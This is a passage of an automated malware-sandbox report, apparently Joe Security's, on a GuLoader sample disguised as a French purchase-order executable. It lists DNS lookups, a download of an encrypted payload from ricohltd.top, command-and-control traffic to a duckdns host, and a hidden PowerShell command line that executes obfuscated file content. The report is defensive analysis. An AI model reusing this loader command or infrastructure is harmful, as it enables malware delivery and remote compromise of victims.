                                                      Apr 26, 2024 07:44:27.043879032 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043890953 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043890953 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043994904 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044007063 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044019938 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044034004 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044038057 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.044066906 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.140723944 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:34.338869095 CEST2987149708193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:34.341164112 CEST4970829871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:34.622817993 CEST2987149708193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:45:05.301465988 CEST2987149708193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:45:05.361509085 CEST4970829871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:45:06.411159992 CEST4970829871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:45:06.702857018 CEST2987149708193.222.96.21192.168.2.6

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 26, 2024 07:44:20.590603113 CEST4985053192.168.2.61.1.1.1
                                                      Apr 26, 2024 07:44:21.025942087 CEST53498501.1.1.1192.168.2.6
                                                      Apr 26, 2024 07:44:23.007698059 CEST5984353192.168.2.61.1.1.1
                                                      Apr 26, 2024 07:44:24.221307039 CEST5984353192.168.2.61.1.1.1
                                                      Apr 26, 2024 07:44:24.275594950 CEST53598431.1.1.1192.168.2.6
                                                      Apr 26, 2024 07:44:24.346457005 CEST53598431.1.1.1192.168.2.6
                                                      Apr 26, 2024 07:44:25.135272026 CEST6027553192.168.2.61.1.1.1
                                                      Apr 26, 2024 07:44:25.261629105 CEST53602751.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Apr 26, 2024 07:44:20.590603113 CEST192.168.2.61.1.1.10x9622Standard query (0)ricohltd.topA (IP address)IN (0x0001)false
                                                      Apr 26, 2024 07:44:23.007698059 CEST192.168.2.61.1.1.10x8d98Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                                      Apr 26, 2024 07:44:24.221307039 CEST192.168.2.61.1.1.10x8d98Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                                      Apr 26, 2024 07:44:25.135272026 CEST192.168.2.61.1.1.10xaa48Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Apr 26, 2024 07:44:21.025942087 CEST1.1.1.1192.168.2.60x9622No error (0)ricohltd.top172.67.191.112A (IP address)IN (0x0001)false
                                                      Apr 26, 2024 07:44:21.025942087 CEST1.1.1.1192.168.2.60x9622No error (0)ricohltd.top104.21.60.38A (IP address)IN (0x0001)false
                                                      Apr 26, 2024 07:44:24.275594950 CEST1.1.1.1192.168.2.60x8d98No error (0)learfo55ozj01.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                      Apr 26, 2024 07:44:24.346457005 CEST1.1.1.1192.168.2.60x8d98No error (0)learfo55ozj01.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                      Apr 26, 2024 07:44:25.261629105 CEST1.1.1.1192.168.2.60xaa48No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • ricohltd.top
                                                      • geoplugin.net

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649710178.237.33.50802644C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 26, 2024 07:44:25.500421047 CEST71OUTGET /json.gp HTTP/1.1
                                                      Host: geoplugin.net
                                                      Cache-Control: no-cache
                                                      Apr 26, 2024 07:44:25.741831064 CEST1169INHTTP/1.1 200 OK
                                                      date: Fri, 26 Apr 2024 05:44:25 GMT
                                                      server: Apache
                                                      content-length: 961
                                                      content-type: application/json; charset=utf-8
                                                      cache-control: public, max-age=300
                                                      access-control-allow-origin: *
                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                      Data Ascii: { "geoplugin_request":"102.129.152.220", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649707172.67.191.1124432644C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-26 05:44:21 UTC173OUTGET /aCqwFQDQz144.bin HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: ricohltd.top
                                                      Cache-Control: no-cache
                                                      2024-04-26 05:44:21 UTC840INHTTP/1.1 200 OK
                                                      Date: Fri, 26 Apr 2024 05:44:21 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 494656
                                                      Connection: close
                                                      Last-Modified: Mon, 15 Apr 2024 18:39:36 GMT
                                                      ETag: "661d7468-78c40"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      CF-Cache-Status: HIT
                                                      Age: 231204
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1ffA9aZlCmqakeWDnYd6bNLon2lPvzmtdNrWc0UQ4nYyTzzrYkjq0qklyIEEM7x7Ko8LyDklASUZMQ5K1uAsrdQ6BCF2HmwupoYv%2Bg%2BJDQf6%2F7mv1FIecOMK3LUQoo%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                      X-Content-Type-Options: nosniff
                                                      Server: cloudflare
                                                      CF-RAY: 87a442ae8c5cd9f9-MIA
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-26 05:44:21 UTC529INData Raw: 03 a6 a8 e2 1f 9d 3d 79 f2 7f 54 c4 c6 ff a6 de ec 0d 2d ae 32 50 df bc d0 75 ae 2d c7 b4 bb bd 22 37 1d 29 cb e3 35 ab de f7 e7 2f 85 26 68 6c d2 bc a0 9c b3 09 3c 8f dc 6f cf fd 14 29 5a 5b 44 19 f7 89 e3 a0 9f 9a df 2e 88 fe 05 9c a2 dd 9e 65 67 14 01 b3 d8 66 e3 30 76 58 7e 37 e3 53 8d 4c 81 a6 54 b9 60 e1 cc 35 ab 0b 41 2f c5 8e 71 9d 7c cd 35 68 ac 42 c8 99 ce 98 ac 4e 2f b7 7c d1 3c 86 d6 92 0b 66 28 0d 47 04 bf 78 ee 80 3c 87 bb 79 05 cf 6b 7f 06 2d fb 6d 0d cf 2a b3 a4 04 9f 13 96 a9 11 fe ff 09 95 41 cf aa f8 15 2e 5e 98 38 c8 97 72 e4 19 45 30 47 c5 72 47 cf 0b c5 9d 7e aa f1 8f 7c 1e c6 b6 69 0f 08 43 4a a6 cb 14 44 89 3e 32 f5 89 37 a1 70 a3 1c 6c b9 06 13 f5 ea d3 4d 6d 26 b4 22 1c da 2c f1 36 40 88 2d ad 53 14 e5 50 7b b2 76 e8 7f 5b 61 b0
                                                      Data Ascii: =yT-2Pu-"7)5/&hl<o)Z[D.egf0vX~7SLT`5A/q|5hBN/|<f(Gx<yk-m*A.^8rE0GrG~|iCJD>27plMm&",6@-SP{v[a
                                                      2024-04-26 05:44:21 UTC1369INData Raw: db 4f 7b 44 d1 b3 da 6b bb f1 36 00 88 0c 0e c2 3e b6 3e 8a 7e 31 f5 f4 85 2a 8b fe cd b2 75 2f f0 14 4a dc ad 1c 3f 2a ed e9 de a8 1f 40 2f c8 4f 47 97 71 dc 5d f3 f3 a0 69 23 e4 bd 82 2a 19 b7 08 92 b8 48 1d a3 65 94 93 bd fb 55 a4 36 12 8b 31 1c c8 4b 6b f5 ed 25 3f c8 02 3c 35 27 1c d1 e9 4a 2c 4d bd 85 02 9e 6b b5 9a c8 44 38 a9 38 6d 4d c9 9e 3d 5a 9e f4 3b c6 b0 1a 2d e4 f2 ab f5 b2 8a a8 6c 5c e6 5c 65 ce 4e 7b bd c2 6e ef 44 2b ac a4 8d 6d 6c c8 ce 87 4a cf 1d 41 11 c7 cc 9f 5c 99 d0 61 54 c0 2b 17 c0 44 72 62 fc 3b 94 48 b1 bb 06 61 2b 68 64 35 fa fc 41 90 6c 80 4b 96 e9 c7 56 62 f5 86 a2 0a 55 fc 0b 46 27 88 04 ca ac a1 fe 7a 61 51 22 b0 e2 06 00 b3 4a 9a 19 19 cf dc f3 5d 88 0b b5 98 38 c0 e1 75 73 af 78 d0 d0 06 2d 40 e0 69 8b 02 11 91 86 c0
                                                      Data Ascii: O{Dk6>>~1*u/J?*@/OGq]i#*HeU61Kk%?<5'J,MkD88mM=Z;-l\\eN{nD+mlJA\aT+Drb;Ha+hd5AlKVbUF'zaQ"J]8usx-@i
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 0b 29 b6 45 cb 71 75 47 f9 36 68 f5 81 71 79 9a df a4 a7 b1 ba 72 ce ee 2b 56 63 02 43 2c 81 45 48 2b 9a 03 90 00 b3 9b e1 ff ad 0c 0d 0f ed 5b 4b 6c 49 4b e8 d3 24 a4 b5 dc db dd 68 8b 27 fb 89 03 d6 ab 35 2b 86 7c 18 e6 72 88 dd 3e 45 69 84 af 72 fe 57 3a 19 26 bb fa 38 5a 02 56 fd e3 52 2f 1a 49 07 31 ad 69 f9 03 dc b1 cc 1d b9 c5 03 24 e6 d1 0c 12 30 d2 7c 24 84 bb 58 c4 63 a4 cb 36 0a e3 54 36 ce 8f 7b 71 1f 6d 38 0c d2 3e 68 b4 1b 20 8c 03 86 7b 04 19 fc b3 35 cb 84 7d 1e 26 f6 af 2d d6 b0 f1 76 c5 6e 03 0b bf 83 2d a5 b1 f6 49 b7 c1 85 aa 94 07 25 19 db 0e 1f 78 1f 77 1e 68 b8 05 f1 8e be 38 dc 14 a1 c0 12 28 77 9b 8d 42 27 9d 6e ff c0 b2 1a 9a 5e fd 67 42 33 98 65 94 30 16 3a 56 63 ab 2d 31 f2 49 eb fd 45 d3 a8 f8 f2 4e cf 45 3c 08 95 ce e6 c2 84
                                                      Data Ascii: )EquG6hqyr+VcC,EH+[KlIK$h'5+|r>EirW:&8ZVR/I1i$0|$Xc6T6{qm8>h {5}&-vn-I%xwh8(wB'n^gB3e0:Vc-1IENE<
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 7d 95 f7 9c dc 6f b0 5b a8 4a 9b 83 f9 8a b2 6e 31 27 9d 38 9c 30 33 ea 64 12 0c bb 7e a0 24 15 dc 9c cf 7f 6d 90 0f 10 ae 10 da a2 b1 8d 07 4e b1 2f fe e9 76 6a 5b 62 08 f6 cb 24 f7 c5 38 0e 41 af 17 a4 da 91 ab 48 de e1 f3 04 8a 0d 1f 24 44 52 8d d3 23 de aa 59 87 0e 32 1d 47 a5 ae 1c 81 df 26 24 f0 34 37 00 aa 81 b4 f2 74 de 66 81 b4 89 07 be df 02 36 55 db 32 13 46 a7 5a c7 3a 1f 0e f6 82 42 09 8e 79 eb 4f 79 ed 74 ea 07 1a bd 96 39 59 2e 9c 11 64 4c 8d d8 76 8f d8 39 33 44 1b 56 51 5d fb 6e 6e d7 e5 21 30 02 24 48 ca 57 93 df ef 78 ed f1 04 2e d4 d1 54 06 21 b9 e9 1c 21 69 78 6b 7b 1b 06 95 4b 5c fe a3 79 97 13 90 0f 39 aa e3 91 7a 61 94 81 75 e4 7b 68 a9 62 7d ed 69 84 40 a3 8e ac 1f 7e 03 6f b1 79 78 37 22 00 4f cb e2 d3 17 5f 39 6c 54 07 e5 8b c0
                                                      Data Ascii: }o[Jn1'803d~$mN/vj[b$8AH$DR#Y2G&$47tf6U2FZ:ByOyt9Y.dLv93DVQ]nn!0$HWx.T!!ixk{K\y9zau{hb}i@~oyx7"O_9lT
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 94 4c 7c 27 9c 54 09 b6 0a b8 70 73 52 5c 92 ac a7 a6 4b da 98 9e 98 a4 96 ef e8 69 7d dc 95 ca de cb 26 20 b5 02 0b bb 29 41 a4 3f 39 12 9f d5 c0 14 f1 13 da b8 d1 1c a1 67 ef 37 a0 77 86 1e 0f 89 53 7b 3d 7d 5b 9a 73 2e 1f 17 74 4c d7 f0 a4 97 c0 a3 79 fa bf e3 bd ab f0 47 ea 92 7a 54 de 48 78 3f 17 4b cc 4e bc ea f3 79 e9 55 72 48 8f d7 e4 5d 13 8c 0d 8a 13 ef 99 b4 d1 4f d3 1d 78 82 99 d0 41 3f d3 71 d8 86 e2 54 84 24 c6 99 c6 c0 90 d7 dc 02 c6 6b 5a 40 c6 6c 64 6b d7 04 91 cd a1 bf 68 3d d4 6e 26 1f bb 39 cf 14 2d 10 fc 93 17 d1 fe ac d6 9e c0 03 e6 53 f8 f9 97 64 d6 11 ab 62 0a cd 87 cf 1d f5 0d f6 eb 61 d7 ab 49 7e 24 52 9d df b3 29 e6 3a 74 92 16 a8 12 87 b5 f4 12 3f a0 82 4f 3b c5 36 ac 1b 58 b2 1f fc 7a cd ae 0e be 34 71 88 c2 eb 5d 79 e8 2c 27
                                                      Data Ascii: L|'TpsR\Ki}& )A?9g7wS{=}[s.tLyGzTHx?KNyUrH]OxA?qT$kZ@ldkh=n&9-SdbaI~$R):t?O;6Xz4q]y,'
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 02 b7 3f e3 cd 35 3d 1c bd b3 b4 c6 06 76 79 5e 9e f4 b0 2e 7b d5 ae d9 dc c7 e7 e5 03 4f 92 a3 5d 8a 6d 8f 1f e0 75 2a 8b 1c bb d4 fc df 40 85 b1 35 31 78 1a 27 4a b3 ee 38 4f 5b 10 72 f8 49 b7 49 b8 9b 4b b4 f9 a9 a3 d3 57 b5 4e 34 51 89 21 67 64 35 a3 52 cc 5b 84 01 b5 69 16 4c 9e 8a 9a 8b a2 0a 96 da 0b 0d c6 07 f8 5d 37 2d 75 b1 da a3 ca 21 1c 79 f8 38 5c 15 d2 90 df 34 20 5e 88 0b 3e cd 38 4b 2e 1f 73 c5 78 59 80 ee a6 fe 31 e4 a7 2e 2f ca 44 c4 6a 21 8f c7 8a 94 ed 5a fc f7 9a ff 6e d3 46 a6 87 6f 1e 83 09 b8 a9 bd 77 a5 23 b3 0a e5 14 ca 1c 07 ef b3 05 00 40 ca 1e 48 97 e8 3d f2 6e 88 65 63 de 9c 8b 81 ca 5e f8 b9 f5 16 0d 36 7a 93 04 c4 86 e0 43 d2 bb 1e 50 52 66 8f a0 83 2b 90 2c 9a 04 04 cd 72 60 24 98 28 76 68 34 3f 11 6d f9 58 72 c0 00 c5 b0
                                                      Data Ascii: ?5=vy^.{O]mu*@51x'J8O[rIIKWN4Q!gd5R[iL]7-u!y8\4 ^>8K.sxY1./Dj!ZnFow#@H=nec^6zCPRf+,r`$(vh4?mXr
                                                      2024-04-26 05:44:21 UTC1369INData Raw: cf c5 31 c4 dc cf 39 59 f5 0a 7a 24 bd c7 19 bb 3a 94 e9 b7 b8 94 f5 ec 13 e2 0d e3 3e 17 35 77 73 ae 4a 3b 81 05 6c 59 e7 74 48 73 ed 75 14 d5 71 43 3d ad 02 41 9d b6 e6 ae 1b 0f b8 f7 6e 7b 7a ee f2 86 bf f4 a8 14 2e 9d c5 8b 86 50 57 d7 5d 95 04 65 58 1a 55 b5 95 9f 64 49 0b 3f de 0e 8a e7 fb ee f8 d2 8b 99 0f 60 2e fe 1a a7 e5 10 45 3f 63 42 da 4e 76 f1 69 69 51 52 2d bb b1 85 ae 73 43 4b 27 82 db 45 cf 95 50 99 54 60 7f d0 65 56 4f a1 d4 ae b4 a4 dd 7f 32 db 1a ba e8 4d ff 6a a9 52 f2 d4 b4 00 77 e2 6b 5d 89 6f 34 5a df c2 d3 53 c7 04 9a a2 18 92 57 b6 b3 eb f3 40 e4 b0 27 ae 3e 5d 4f e6 8a 31 b8 e3 3a 40 ab e6 83 4a f8 63 bd 1f 02 1f ae 33 aa 24 ff e2 55 7b be e5 a5 10 22 51 12 03 13 28 14 8a a1 f4 6a 3f bd db ca 9d 91 b4 7f 8e a1 be 7a 48 e5 d5 1e
                                                      Data Ascii: 19Yz$:>5wsJ;lYtHsuqC=An{z.PW]eXUdI?`.E?cBNviiQR-sCK'EPT`eVO2MjRwk]o4ZSW@'>]O1:@Jc3$U{"Q(j?zH
                                                      2024-04-26 05:44:21 UTC1369INData Raw: e8 91 97 b9 79 77 67 a8 80 90 61 49 b5 35 f9 2e d8 33 80 26 92 cc 2e 15 c1 7c 81 3c ca 55 5f cd b3 60 de 9e ce 50 af f8 e3 15 be 12 2d 0a 90 af 97 84 8d 52 e1 a3 47 fc 3b 44 21 01 c4 3b b7 ca bb e4 c1 a0 54 a2 1c b7 35 d4 bf ad 2a 70 ed 48 4c 94 4c 9c 42 ee b2 35 cd a4 78 ab 7c 83 77 29 06 95 12 86 c6 36 f5 b3 8f c9 cd 3d 42 4c af 7a 61 cd b2 0f c3 5d 46 ea e9 31 c9 85 cb 7a a3 8e f5 1f e2 aa 27 7c 31 90 1c 37 6a 4e f8 6b fc ee 37 11 cc 5c 6e 0f 74 43 82 e8 59 34 ff fb 73 6c 6c 5a 79 12 f6 7f 20 7e 42 6c 9e 40 05 86 c5 39 a7 8e 6f 4d 10 c2 67 60 44 d8 12 55 f3 fb e8 66 76 e0 fe 4b 94 78 cb 2c f3 75 d0 6d b2 f0 34 6b ae df f4 c9 ab 5e 78 76 b3 78 64 c8 3c 98 6f ac 3e 06 85 03 9e e0 33 61 ee 69 09 8e bb 3f 0b dd 0d e2 69 b4 6e ba c5 a9 3e 5d 0b bd 69 1c 83
                                                      Data Ascii: ywgaI5.3&.|<U_`P-RG;D!;T5*pHLLB5x|w)6=BLza]F1z'|17jNk7\ntCY4sllZy ~Bl@9oMg`DUfvKx,um4k^xvxd<o>3ai?in>]i
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 57 bc 16 12 97 ef 42 36 79 5a 6f b4 2f 4b d4 71 83 13 62 d5 c0 4a 69 90 c5 7b 82 c7 d0 62 3c 9a 80 85 12 79 a5 06 56 af 99 39 3f e0 e3 85 d1 d9 19 48 cb ca 8c ae 80 e2 e8 05 f8 32 a5 4f 31 d4 a6 df 13 b4 45 c3 d4 29 10 bb 7b 4d 9f da a8 45 58 6c be 24 bf 74 4b 7c 9b 78 bd 14 b3 86 a8 77 fa 44 33 06 d2 64 84 3e f5 4f 7e cd f3 8a d6 4e 7f b1 35 c8 c2 20 a0 86 2c 5d 4b 6a 0e b7 88 83 bf 05 c9 87 0c 45 87 07 14 7e a8 9f 19 fc ce fa 46 90 14 3a ac 5a a4 fc 77 3b b6 7c 09 44 b8 56 20 1a e6 99 38 a2 ba 8e 32 f7 cc dc e2 35 f8 35 e4 1c 51 e1 eb 33 10 63 22 4e 8a cc 47 83 b4 d6 f9 f4 0c b8 13 15 19 6b a6 25 ea 44 08 38 2a 81 ad a5 98 9a a1 a8 87 ed c8 62 3a de 91 c3 0e 37 48 27 34 6e 00 63 ac 65 ac bd ae de df 07 8f f3 ea 33 22 6f dd ef 03 49 15 3d cf 28 c7 a1 bc
                                                      Data Ascii: WB6yZo/KqbJi{b<yV9?H2O1E){MEXl$tK|xwD3d>O~N5 ,]KjE~F:Zw;|DV 8255Q3c"NGk%D8*b:7H'4nce3"oI=(
                                                      2024-04-26 05:44:21 UTC1369INData Raw: f2 73 85 62 f6 43 1c 16 39 a1 ac dd 34 22 f2 6b 38 0e ba 05 92 01 23 c4 b5 18 e2 4a 67 68 4b 2f 9d fb 46 87 2f 93 c1 7d e8 ae c6 07 8f f1 55 8a 97 51 d5 d7 ff fb b5 30 1f e5 ec 21 53 79 f3 49 9d 02 3f c9 45 eb 23 15 fa e1 7e 05 06 ba e7 14 65 77 4c 16 58 fa 60 b1 ca 17 6c 02 44 55 0b e7 62 99 d4 71 46 8b 81 04 bb 07 46 fc ae 50 03 86 9e 78 ff 09 af 81 0c 50 d1 6e ed c9 2d 8b 2c f9 26 85 a5 eb fb cd 74 60 24 74 d7 89 f9 e4 b5 1c d0 28 b7 f1 bd f3 b0 e1 0a 0a b1 d4 55 30 00 61 9d 48 06 2d 76 52 7e 3f 34 c4 c4 da de c2 8f d8 38 18 50 72 62 4d c6 47 80 ee 8d a1 e7 b4 99 f4 79 b8 d1 a5 eb 33 1f 86 09 0a fe 63 90 88 3a 6d 20 b2 cc 60 42 2e 34 47 04 2c 11 ec ba 9c 91 f2 3e 61 c0 fa 60 88 96 00 fd 98 12 61 35 01 a8 dc b0 70 87 fb 0a aa e5 10 2a 7b 1e 9f 58 73 5d
                                                      Data Ascii: sbC94"k8#JghK/F/}UQ0!SyI?E#~ewLX`lDUbqFFPxPn-,&t`$t(U0aH-vR~?48PrbMGy3c:m `B.4G,>a`a5p*{Xs]


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:07:42:57
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"
                                                      Imagebase:0x400000
                                                      File size:561'426 bytes
                                                      MD5 hash:EDEB34F392872F3C9E220BC9DCF9BA86
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:07:42:57
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
                                                      Imagebase:0xb00000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2927351766.0000000009F92000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:07:42:57
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:07:42:59
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
